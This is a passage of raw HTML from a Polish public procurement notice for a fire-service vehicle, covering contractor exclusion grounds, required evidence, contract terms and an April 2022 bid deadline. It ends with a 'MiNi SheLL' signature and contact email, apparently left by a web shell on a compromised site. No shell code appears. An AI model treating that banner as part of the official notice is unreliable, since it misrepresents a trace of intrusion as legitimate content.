class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W celu potwierdzenia braku podstaw wykluczenia Wykonawcy z udziału w postępowaniu o udzielenie zamówienia, o których mowa w art. 108 ustawy Pzp i art. 109 ust. 1 pkt 1 i 4 Wykonawca składa następujące podmiotowe środki dowodowe (dotyczy Wykonawcy, którego oferta została<br/>najwyżej oceniona):<br/>1)	oświadczenie wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy, w zakresie podstaw wykluczenia z postępowania wskazanych przez zamawiającego, o których mowa w Rozdziale IX SWZ. Wzór oświadczenia stanowi załącznik nr 4 do SWZ. Oświadczenie składają odrębnie wykonawca/każdy spośród wykonawców wspólnie ubiegających się o udzielenie zamówienia. W takim przypadku oświadczenie potwierdza brak podstaw wykluczenia wykonawcy;<br/>2)	odpis lub informację z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> W celu potwierdzenia zgodności oferowanych dostaw z opisem przedmiotu zamówienia, Zamawiający wymaga, ABY WYKONAWCA ZŁOŻYŁ WRAZ Z OFERTĄ następujące PRZEDMIOTOWE ŚRODKI DOWODOWE:<br/>1)	Formularz parametrów techniczno-użytkowych – wypełniony, sporządzony na podstawie wzoru stanowiącego załącznik 1b do SWZ;<br/>2)	Zaświadczenie, z właściwej terenowo, dla Wykonawcy, Komedy Powiatowej/Miejskiej PSP, iż pojazd jest w podziale jednostki ochrony przeciwpożarowej i jest wpisany do systemu SWD PSP, potwierdzające możliwość przeniesienia w systemie SWD PSP oferowanego pojazdu do podziału OSP Kłodzisko, na terenie działania KP PSP Szamotuły lub aktualne świadectwo dopuszczenia CNBOP-PIB, lub aktualną opinię techniczną CNBOP-PIB,<br/>3)	Dokumentację fotograficzną czterech boków pojazdu i dachu pojazdu, <br/>4)	Wyciąg ze świadectwa homologacji. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> 1)	Formularz parametrów techniczno-użytkowych – wypełniony, sporządzony na podstawie wzoru stanowiącego załącznik 1b do SWZ;<br/>2)	Zaświadczenie, z właściwej terenowo, dla Wykonawcy, Komedy Powiatowej/Miejskiej PSP, iż pojazd jest w podziale jednostki ochrony przeciwpożarowej i jest wpisany do systemu SWD PSP, potwierdzające możliwość przeniesienia w systemie SWD PSP oferowanego pojazdu do podziału OSP Kłodzisko, na terenie działania KP PSP Szamotuły lub aktualne świadectwo dopuszczenia CNBOP-PIB, lub aktualną opinię techniczną CNBOP-PIB,<br/>3)	Dokumentację fotograficzną czterech boków pojazdu i dachu pojazdu, <br/>4)	Wyciąg ze świadectwa homologacji. <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Zgodnie z art. 63 ust. 2 ustawy Pzp ofertę, oświadczenie, o którym mowa w art. 125 ust. 1 składa się, pod rygorem nieważności w formie elektronicznej (tj. opatrzonej podpisem kwalifikowanym) lub w postaci elektronicznej opatrzonej<br/>podpisem zaufanym lub podpisem osobistym.<br/>INNE oświadczenia, dokumenty składane RAZEM Z OFERTĄ:<br/>1) Formularz ofertowy - sporządzony na podstawie wzoru stanowiącego załącznik 1a do SWZ;<br/>2) Aktualne na dzień składania ofert oświadczenie o braku podstaw do<br/>wykluczenia z postępowania (art. 125 ust. 1 ustawy Pzp) – zgodnie z załącznikiem nr 3 do SWZ;<br/>3) Samooczyszczenie – jeżeli dotyczy;<br/>4) Pełnomocnictwo - jeżeli dotyczy;<br/>5) Zastrzeżenie tajemnicy przedsiębiorstwa – jeżeli dotyczy. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty. <br/>2.	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia, o których mowa w Rozdziale X ust. 2 pkt 2 SWZ, składa każdy z Wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia.<br/>3.	Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-04-22 08:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/wronki</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-04-22 08:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com